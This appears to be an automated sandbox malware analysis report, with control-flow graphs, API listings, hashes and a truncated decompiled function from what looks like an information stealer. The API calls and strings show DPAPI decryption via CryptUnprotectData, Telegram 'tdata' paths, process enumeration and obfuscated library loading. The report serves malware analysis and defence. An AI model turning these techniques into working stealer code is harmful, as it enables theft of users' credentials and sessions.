                                    0x00883e12
                                    0x00883e04
                                    0x00883e04
                                    0x00883e07
                                    0x00000000
                                    0x00883e09
                                    0x00883e09
                                    0x00883e0a
                                    0x00883e0f
                                    0x00883e07
                                    0x00883e18
                                    0x00883e23
                                    0x00883e2c
                                    0x00883c22
                                    0x00883c26
                                    0x00883c2b
                                    0x00883c2c
                                    0x00883c2e
                                    0x00000000
                                    0x00883c34
                                    0x00883c38
                                    0x00883c3d
                                    0x00883c3e
                                    0x00883c40
                                    0x00000000
                                    0x00883c46
                                    0x00883c4c
                                    0x00883c51
                                    0x00883c57
                                    0x00883c5e
                                    0x00883c64
                                    0x00883c67
                                    0x00883c6d
                                    0x00883c76
                                    0x00883c77
                                    0x00883c78
                                    0x00883c7e
                                    0x00883c84
                                    0x00883c87
                                    0x00883c8e
                                    0x00883c93
                                    0x00883c93
                                    0x00883c95
                                    0x00883c95
                                    0x00883c98
                                    0x00883c9f
                                    0x00883cb1
                                    0x00883cb1
                                    0x00883cb3
                                    0x00883ca1
                                    0x00883ca1
                                    0x00883ca6
                                    0x00883ca8
                                    0x00000000
                                    0x00883caa
                                    0x00883cac
                                    0x00883cac
                                    0x00883ca8
                                    0x00883cb5
                                    0x00883cb8
                                    0x00883cc0
                                    0x00883cd4
                                    0x00883cdc
                                    0x00883cde
                                    0x00883cec
                                    0x00883cee
                                    0x00883ce0
                                    0x00883ce0
                                    0x00883ce3
                                    0x00000000
                                    0x00883ce5
                                    0x00883ce7
                                    0x00883ce7
                                    0x00883ce3
                                    0x00883d03
                                    0x00883d0c
                                    0x00883d0e
                                    0x00883d1d
                                    0x00883d20
                                    0x00883d10
                                    0x00883d10
                                    0x00883d13
                                    0x00000000
                                    0x00883d15
                                    0x00883d18
                                    0x00883d18
                                    0x00883d13
                                    0x00883d0e
                                    0x00883d2a
                                    0x00883d34
                                    0x00883d39
                                    0x00883d3e
                                    0x00883d43
                                    0x00883d43
                                    0x00883c40
                                    0x00883c2e
                                    0x00883a59
                                    0x00883a59
                                    0x00883a5f
                                    0x00883a64
                                    0x00883a9a
                                    0x00883a9b
                                    0x00883aa1
                                    0x00883aa3
                                    0x00883aa3
                                    0x00883aa6
                                    0x00883aa6
                                    0x00883aa8
                                    0x00883aa9
                                    0x00883aaf
                                    0x00883aba
                                    0x00883abf
                                    0x00883ac4
                                    0x00883ace
                                    0x00000000
                                    0x00883ad4
                                    0x00883ad4
                                    0x00883ad6
                                    0x00883ad7
                                    0x00883ad7
                                    0x00883ada
                                    0x00883ada
                                    0x00883adc
                                    0x00883add
                                    0x00883ae4
                                    0x00883ae9
                                    0x00883aee
                                    0x00883af3
                                    0x00883afb
                                    0x00883afc
                                    0x00883b02
                                    0x00883b07
                                    0x00883b0c
                                    0x00883b12
                                    0x00883b17
                                    0x00883b18
                                    0x00883b1b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00883b1b
                                    0x00883b1d
                                    0x00883b1f
                                    0x00883b23
                                    0x00883b25
                                    0x00883b25
                                    0x00883b2d
                                    0x00883b33
                                    0x00883b36
                                    0x00883b36
                                    0x00883b3b
                                    0x00000000
                                    0x00000000
                                    0x00883b44
                                    0x00883b44
                                    0x00883b47
                                    0x00883b4a
                                    0x00883b4c
                                    0x00883b5a
                                    0x00883b5c
                                    0x00883b5e
                                    0x00883b61
                                    0x00883b63
                                    0x00883b65
                                    0x00883b67
                                    0x00883b67
                                    0x00883b69
                                    0x00883b6c
                                    0x00000000
                                    0x00000000
                                    0x00883b6e
                                    0x00883b6f
                                    0x00883b71
                                    0x00883b73
                                    0x00883b75
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00883b75
                                    0x00883b67
                                    0x00883b77
                                    0x00883b77
                                    0x00883b79
                                    0x00883b7b
                                    0x00883b86
                                    0x00883b88
                                    0x00883b92
                                    0x00883b92
                                    0x00883b94
                                    0x00883b96
                                    0x00000000
                                    0x00000000
                                    0x00883b8d
                                    0x00883b8f
                                    0x00883b91
                                    0x00883b91
                                    0x00000000
                                    0x00883b91
                                    0x00000000
                                    0x00883b8f
                                    0x00883b92
                                    0x00883b79
                                    0x00883b98
                                    0x00883b98
                                    0x00883b9b
                                    0x00883b9f
                                    0x00883b9f
                                    0x00883ba2
                                    0x00883ba6
                                    0x00883bab
                                    0x00883bb1
                                    0x00883bb4
                                    0x00883bb6
                                    0x00883bcc
                                    0x00883bcf
                                    0x00883bd7
                                    0x00883bdc
                                    0x00883be1
                                    0x00000000
                                    0x00883be1
                                    0x00883bb8
                                    0x00883bbe
                                    0x00883bc3
                                    0x00883bc6
                                    0x00883bc8
                                    0x00000000
                                    0x00883bca
                                    0x00883bc8
                                    0x00883b0c
                                    0x00000000
                                    0x00883af3
                                    0x00883a66
                                    0x00883a66
                                    0x00883a68
                                    0x00883a6a
                                    0x00883a6a
                                    0x00883a6e
                                    0x00000000
                                    0x00000000
                                    0x00883a72
                                    0x00883a86
                                    0x00883a86
                                    0x00883a74
                                    0x00883a74
                                    0x00883a7a
                                    0x00000000
                                    0x00883a7c
                                    0x00883a7c
                                    0x00883a7f
                                    0x00883a84
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00883a84
                                    0x00883a7a
                                    0x00883a8f
                                    0x00883a91
                                    0x00883be6
                                    0x00883be6
                                    0x00883a97
                                    0x00883a97
                                    0x00000000
                                    0x00883a97
                                    0x00000000
                                    0x00883a91
                                    0x00883a8a
                                    0x00883a8c
                                    0x00883a8c
                                    0x00000000
                                    0x00883a8c
                                    0x00883a64
                                    0x00000000

                                    APIs
                                    Strings
                                    • W. Europe Standard Time, xrefs: 00883CCD
                                    • W. Europe Daylight Time, xrefs: 00883CFC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$InformationTimeZone
                                    • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                    • API String ID: 597776487-986674615
                                    • Opcode ID: 106f773932690507e9b79b1135e65b6a064a34952759492f7b0758d6d629614e
                                    • Instruction ID: 67a9fa2d0016cc7930174e1186f0356ec55049e33e337ba062238e37fe33d819
                                    • Opcode Fuzzy Hash: 106f773932690507e9b79b1135e65b6a064a34952759492f7b0758d6d629614e
                                    • Instruction Fuzzy Hash: E7C13671904219AFDB24FF6CDC42AAA7BA9FF12B20F14415AE490E7282E7319F05CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00819294 Relevance: 11.0, Strings: 8, Instructions: 1004COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3756 819294-8192e0 call 890cfc 3759 8192e2-8192f4 call 86db91 3756->3759 3760 81931c-819322 3756->3760 3759->3760 3767 8192f6-81931b call 86dfe8 call 86db47 3759->3767 3762 819333-819369 call 82da74 3760->3762 3763 819324 3760->3763 3770 8193a0-8193a7 3762->3770 3771 81936b-81937e call 86db91 3762->3771 3765 819326-819331 3763->3765 3765->3762 3765->3765 3767->3760 3774 8193a9 3770->3774 3775 8193b8-8193f7 call 82da74 call 82bb72 call 82ea7d 3770->3775 3771->3770 3780 819380-81939f call 82d54d call 86dfe8 call 86db47 3771->3780 3778 8193ab-8193b6 3774->3778 3791 81a1c1-81a1da call 82df41 3775->3791 3792 8193fd-8195f7 call 818f5d * 2 call 82e8c7 call 82fa3b call 82e917 call 82fa3b call 82df41 * 5 call 818f5d * 2 call 82e8c7 call 82fa3b call 82e917 call 82fa3b call 82df41 * 5 call 82fec9 call 812e70 call 82dd77 call 81a25a * 2 3775->3792 3778->3775 3778->3778 3780->3770 3851 8195f9 call 8116cb 3792->3851 3852 8195fe 3792->3852 3851->3852 3854 819602-819604 3852->3854 3855 8198f2-8198f4 3854->3855 3856 81960a-819613 call 812a7c 3854->3856 3857 8198f6-8198f8 call 8116cb 3855->3857 3858 8198fd-819902 3855->3858 3865 819619-819666 call 8123eb call 82e5d4 3856->3865 3866 8198df-8198ed call 812ebb 3856->3866 3857->3858 3860 819904-819909 call 8116cb 3858->3860 3861 81991e-81994a 3858->3861 3860->3861 3867 819984-81998b 3861->3867 3868 81994c-81995f call 86db91 3861->3868 3887 8196a1-8196a8 3865->3887 3888 819668-81967b call 86db91 3865->3888 3866->3854 3873 81998d 3867->3873 3874 81999c-819a4a call 82e0ab call 82e917 call 82fec9 call 812e70 call 82dd77 call 82df41 * 2 call 81a25a * 2 3867->3874 3868->3867 3882 819961-819983 call 86dfe8 call 86db47 3868->3882 3879 81998f-81999a 3873->3879 3929 819a51 3874->3929 3930 819a4c call 8116cb 3874->3930 3879->3874 3879->3879 3882->3867 3893 8196b9-8196e9 call 82d960 call 82df41 call 82dd77 3887->3893 3894 8196aa 3887->3894 3888->3887 3902 81967d-8196a0 call 86dfe8 call 86db47 3888->3902 3893->3866 3915 8196ef-8197ba call 82fec9 call 813225 call 82dd77 call 82fec9 call 82e5d4 call 82fec9 call 813139 call 82dd77 call 82df41 call 82dd77 3893->3915 3895 8196ac-8196b7 3894->3895 3895->3893 3895->3895 3902->3887 3915->3866 3998 8197c0-81982f call 8123eb call 82e5d4 3915->3998 3934 819a55-819a57 3929->3934 3930->3929 3936 819e74-819e76 3934->3936 3937 819a5d-819a66 call 812a7c 3934->3937 3940 819e78-819e7a call 8116cb 3936->3940 3941 819e7f-819e84 3936->3941 3948 819e61-819e6f call 812ebb 3937->3948 3949 819a6c-819ac0 call 8123eb call 82e5d4 3937->3949 3940->3941 3945 819e86-819e8b call 8116cb 3941->3945 3946 819e9b-819ede call 82d9c4 3941->3946 3945->3946 3957 819ee0-819ef3 call 86db91 3946->3957 3958 819f15-819f1c 3946->3958 3948->3934 3975 819ac2-819ad5 call 86db91 3949->3975 3976 819afa-819b01 3949->3976 3957->3958 3973 819ef5-819f14 call 82d6b7 call 86dfe8 call 86db47 3957->3973 3964 819f2d-819fe4 call 82e0ab call 82e917 call 82fec9 call 812e70 call 82dd77 call 82df41 * 2 call 81a25a * 2 3958->3964 3965 819f1e 3958->3965 4060 819fe6 call 8116cb 3964->4060 4061 819feb 3964->4061 3969 819f20-819f2b 3965->3969 3969->3964 3969->3969 3973->3958 3975->3976 3989 819ad7-819af9 call 86dfe8 call 86db47 3975->3989 3979 819b03 3976->3979 3980 819b12-819b45 call 82d960 call 82df41 call 82dd77 3976->3980 3986 819b05-819b10 3979->3986 4013 819c60-819d32 call 82fec9 call 813225 call 82dd77 call 82fec9 call 82e5d4 call 82fec9 call 813139 call 82dd77 call 82df41 call 82dd77 3980->4013 4014 819b4b-819bcb call 8123eb call 82e5d4 call 8123eb call 82e5d4 call 82d8d6 call 81a1e1 3980->4014 3986->3980 3986->3986 3989->3976 4018 819831-819843 call 86db91 3998->4018 4019 81986b-819872 3998->4019 4013->3948 4130 819d38-819db0 call 8123eb call 82e5d4 4013->4130 4086 819bd9-819c5b call 82ea3d call 82e917 call 82d9e5 call 82df41 * 4 call 82dd77 call 82df41 call 82dd77 4014->4086 4087 819bcd 4014->4087 4018->4019 4035 819845-81986a call 86dfe8 call 86db47 4018->4035 4026 819883-8198a3 call 82ea3d 4019->4026 4027 819874 4019->4027 4039 8198a5 4026->4039 4040 8198a7-8198da call 8183df call 82df41 * 2 call 82dd77 4026->4040 4032 819876-819881 4027->4032 4032->4026 4032->4032 4035->4019 4039->4040 4040->3866 4060->4061 4066 819fef-819ff1 4061->4066 4070 819ff7-81a000 call 812a7c 4066->4070 4071 81a08e-81a090 4066->4071 4092 81a002-81a076 call 8123eb call 82e5d4 call 82e917 call 82d9e5 call 82df41 * 2 call 82dd77 4070->4092 4093 81a07b-81a089 call 812ebb 4070->4093 4077 81a092-81a094 call 8116cb 4071->4077 4078 81a099-81a0a2 4071->4078 4077->4078 4084 81a0a4 call 8116cb 4078->4084 4085 81a0a9-81a0b0 4078->4085 4084->4085 4088 81a0b6-81a129 call 82e0ab * 2 call 818dc6 4085->4088 4089 81a199-81a1bc call 82df41 * 3 4085->4089 4086->4013 4095 819bcf-819bd7 4087->4095 4127 81a160-81a197 call 82d30d call 8183df 4088->4127 4128 81a12b-81a13e call 86db91 4088->4128 4089->3791 4092->4093 4093->4066 4095->4086 4095->4095 4127->4089 4128->4127 4144 81a140-81a15f call 82d327 call 86dfe8 call 86db47 4128->4144 4155 819db2-819dc4 call 86db91 4130->4155 4156 819ded-819df4 4130->4156 4144->4127 4155->4156 4168 819dc6-819dec call 86dfe8 call 86db47 4155->4168 4158 819e05-819e25 call 82ea3d 4156->4158 4159 819df6 4156->4159 4175 819e27 4158->4175 4176 819e29-819e5c call 8183df call 82df41 * 2 call 82dd77 4158->4176 4163 819df8-819e03 4159->4163 4163->4158 4163->4163 4168->4156 4175->4176 4176->3948
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                    • String ID: .$@HGI$@r$B$]]H@$rMA@HGI.$}ZKO$}ZKOC~OZF.
                                    • API String ID: 2013694253-3658648673
                                    • Opcode ID: 8846edf811a4de0876a258e20cf19e9a6bbe4fcc123f8b89803eaa45613001a8
                                    • Instruction ID: b662b64cc5a2e7ccb069f45d9df718500026e07dae1f86262a2224dec8a87247
                                    • Opcode Fuzzy Hash: 8846edf811a4de0876a258e20cf19e9a6bbe4fcc123f8b89803eaa45613001a8
                                    • Instruction Fuzzy Hash: 5992BD30D002A8DEDB15EBA8D855BEDBBB4FF15300F144199E45AB7292DF701AC9CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081C9EC Relevance: 10.6, Strings: 8, Instructions: 609COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                    • String ID: #$)\tdata\$.$.$\tdata\$m.$map$zKBKI\OC
                                    • API String ID: 2013694253-2410336440
                                    • Opcode ID: ac2b913457d96e33e63a98431ad8b601c004ab1794a367ff70a1b72439e03412
                                    • Instruction ID: 01cb14e451555ac54d720c026812e9a70935ce4524694d30f70a8f52e625fba2
                                    • Opcode Fuzzy Hash: ac2b913457d96e33e63a98431ad8b601c004ab1794a367ff70a1b72439e03412
                                    • Instruction Fuzzy Hash: D142BD30D00258DADB14EBA8D991BDDBBB4FF55300F1041A9E459F7292EB741EC9CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00856107 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • FindClose.KERNELBASE(000000FF,?,00856136,?,?,?,?,00812C64,?,?,?,?), ref: 00856113
                                    • FindFirstFileExW.KERNELBASE(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00856136,?), ref: 00856143
                                    • GetLastError.KERNEL32(?,?,?,?,00856136,?,?,?,?,00812C64,?,?,?,?), ref: 00856150
                                    • FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00856136,?,?,?,?,00812C64), ref: 0085616A
                                    • GetLastError.KERNEL32(?,?,?,?,00856136,?,?,?,?,00812C64,?,?,?,?), ref: 00856177
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$ErrorFileFirstLast$Close
                                    • String ID:
                                    • API String ID: 569926201-0
                                    • Opcode ID: 9c01a130b53fa88a738fda94f69e731bd3ff4b1b4af996f0046df316c25878cc
                                    • Instruction ID: f5176877b201e69c44e4c31c28ae82007e82e8557877742693750c3d6fc6411b
                                    • Opcode Fuzzy Hash: 9c01a130b53fa88a738fda94f69e731bd3ff4b1b4af996f0046df316c25878cc
                                    • Instruction Fuzzy Hash: C7019231054944BBCB202F76EC0CC6B7F78FB92772B54451AFA68C20A1E7318876D660
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00817D35 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 400COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 0081801F
                                    • GetTickCount.KERNEL32 ref: 00818027
                                      • Part of subcall function 00817BE2: FindCloseChangeNotification.KERNELBASE(00000000,?,00818113), ref: 00817BF7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseCountDesktopFindNotificationTickWindow
                                    • String ID: UT
                                    • API String ID: 3271436846-894488996
                                    • Opcode ID: 44a564bfc4945d1307d0a790f4dba3a1c78988480c762a8ae687016cf6e73e2d
                                    • Instruction ID: e7953633fa96b186de49c4e10fa901e23461915f317e29529150be95f93c75ff
                                    • Opcode Fuzzy Hash: 44a564bfc4945d1307d0a790f4dba3a1c78988480c762a8ae687016cf6e73e2d
                                    • Instruction Fuzzy Hash: 1EF18A716087819FD724DF29C481BAABBE8FF95304F14482EF585C7241EB31E999CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00872780 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,0087277F,?,?,?,?,?,00873E8D), ref: 008727A2
                                    • TerminateProcess.KERNEL32(00000000,?,0087277F,?,?,?,?,?,00873E8D), ref: 008727A9
                                    • ExitProcess.KERNEL32 ref: 008727BB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: aef6462726037168566840c7b3c86265168c29e3d052b765648a3b550f86030f
                                    • Instruction ID: f587ebafcc72a1f0a5bb6fcb38ec160bfd17b78cfcc309bd9508932b1149f2cb
                                    • Opcode Fuzzy Hash: aef6462726037168566840c7b3c86265168c29e3d052b765648a3b550f86030f
                                    • Instruction Fuzzy Hash: 41E08C31124508AFCF157F68CD48A483B39FB44391F048816F809CA135CB36DC82DB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00822705 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(Jx~`.,00000000,00000000,00000000,00000000,00000000,?,?,-00000046,00000000), ref: 0082273D
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CryptDataDeallocateUnprotect
                                    • String ID: r`A\Jx~`.
                                    • API String ID: 174072602-705364654
                                    • Opcode ID: f1483303c7834156a2c78cb18be05a011acdd728b705657880ac617a41f85c20
                                    • Instruction ID: 54b5dd2261caaa7f22a889231b99625d717a76517cbb8ded72305a95b3721f13
                                    • Opcode Fuzzy Hash: f1483303c7834156a2c78cb18be05a011acdd728b705657880ac617a41f85c20
                                    • Instruction Fuzzy Hash: AB118C75D04219AFCB14EFA8E9919EEFBB4FF48300F00412EF512A3251DBB45A44CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00826592 Relevance: 3.1, APIs: 2, Instructions: 126processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32Next.KERNEL32(?,00000128,?,?,?), ref: 008266E6
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000001,00000000), ref: 008265DE
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateDeallocateNextProcess32SnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 2624477505-0
                                    • Opcode ID: ea32b53ebb82c8b248877b82961e4c7f5149b2f40462554b1e26145e8f16e781
                                    • Instruction ID: 50e90395a9ad997eebbc114b113a74ff641ad05ba862edc13ffe640073f9a3cb
                                    • Opcode Fuzzy Hash: ea32b53ebb82c8b248877b82961e4c7f5149b2f40462554b1e26145e8f16e781
                                    • Instruction Fuzzy Hash: 8D5108B1D0021A9FDF10DF99D981AEEBBB4FF58300F54416AE815B3241DB74AA85CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082A518 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 238libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2374 82a518-82a528 2375 82a8b0 2374->2375 2376 82a52e-82a55f 2374->2376 2377 82a8b2-82a8b6 2375->2377 2378 82a561-82a573 call 86db91 2376->2378 2379 82a59b-82a5a1 2376->2379 2378->2379 2388 82a575-82a59a call 86dfe8 call 86db47 2378->2388 2380 82a5b2-82a5c7 LoadLibraryA 2379->2380 2381 82a5a3 2379->2381 2380->2375 2384 82a5cd-82a5ea 2380->2384 2383 82a5a5-82a5b0 2381->2383 2383->2380 2383->2383 2386 82a622-82a628 2384->2386 2387 82a5ec-82a5ff call 86db91 2384->2387 2389 82a62a 2386->2389 2390 82a639-82a66d GetProcAddress 2386->2390 2402 82a601-82a61b call 82cfde call 86dfe8 call 86db47 2387->2402 2403 82a61c 2387->2403 2388->2379 2393 82a62c-82a637 2389->2393 2394 82a6a8-82a6ae 2390->2394 2395 82a66f-82a681 call 86db91 2390->2395 2393->2390 2393->2393 2399 82a6b0 2394->2399 2400 82a6bf-82a6f0 GetProcAddress 2394->2400 2395->2394 2411 82a683-82a6a7 call 82d54d call 86dfe8 call 86db47 2395->2411 2405 82a6b2-82a6bd 2399->2405 2406 82a732-82a738 2400->2406 2407 82a6f2-82a704 call 86db91 2400->2407 2402->2403 2403->2386 2405->2400 2405->2405 2413 82a73a 2406->2413 2414 82a749-82a78b GetProcAddress call 82a8b7 call 82d2ae GetProcAddress 2406->2414 2407->2406 2421 82a706-82a731 call 86dfe8 call 86db47 2407->2421 2411->2394 2419 82a73c-82a747 2413->2419 2432 82a7c6-82a802 call 82d30d GetProcAddress 2414->2432 2433 82a78d-82a79f call 86db91 2414->2433 2419->2414 2419->2419 2421->2406 2442 82a841-82a847 2432->2442 2443 82a804-82a816 call 86db91 2432->2443 2433->2432 2444 82a7a1-82a7c5 call 82d327 call 86dfe8 call 86db47 2433->2444 2447 82a856-82a86f GetProcAddress 2442->2447 2448 82a849-82a854 2442->2448 2443->2442 2453 82a818-82a840 call 86dfe8 call 86db47 2443->2453 2444->2432 2451 82a871-82a878 2447->2451 2452 82a8a4-82a8aa FreeLibrary 2447->2452 2448->2447 2448->2448 2451->2452 2455 82a87a-82a881 2451->2455 2452->2375 2453->2442 2455->2452 2458 82a883-82a88a 2455->2458 2458->2452 2461 82a88c-82a893 2458->2461 2461->2452 2462 82a895-82a897 2461->2462 2462->2452 2465 82a899-82a8a2 2462->2465 2465->2377
                                    C-Code - Quality: 71%
                                    			E0082A518() {
				intOrPtr _v8;
				char _v12;
				short _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				intOrPtr _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				_Unknown_base(*)()* _t52;
				intOrPtr _t56;
				_Unknown_base(*)()* _t57;
				void* _t68;
				void* _t72;
				void* _t78;
				void* _t84;
				void* _t88;
				struct HINSTANCE__* _t89;
				void* _t92;
				void* _t97;
				void* _t102;
				void* _t105;
				intOrPtr _t107;
				intOrPtr* _t118;
				void* _t122;
				void* _t131;
				void* _t135;

				if( *0x8b488b != 0) {
					L43:
					__eflags = 0;
					return 0;
				} else {
					_t88 = 0;
					_v24 = 0x425b4f58;
					_v20 = 0x47424d5a;
					_v16 = 0x42424a00;
					_t107 =  *((intOrPtr*)( *[fs:0x2c]));
					_t42 =  *0x8b54a8; // 0x8000005d
					_v12 = 0x2e;
					_v8 = _t107;
					if(_t42 >  *((intOrPtr*)(_t107 + 4))) {
						E0086DB91(_t42, 0x8b54a8);
						_t121 =  *0x8b54a8 - 0xffffffff;
						_pop(_t105);
						if( *0x8b54a8 == 0xffffffff) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsb");
							L0086DFE8(_t105, _t121, 0x8962b2);
							 *_t118 = 0x8b54a8;
							L0086DB47();
							_t107 = _v8;
						}
					}
					_t122 =  *0x8b5c84 - _t88; // 0x0
					if(_t122 == 0) {
						L7:
						_t43 = LoadLibraryA(0x8b5c78); // executed
						_t89 = _t43;
						 *0x8b4858 = _t89;
						if(_t89 == 0) {
							goto L43;
						}
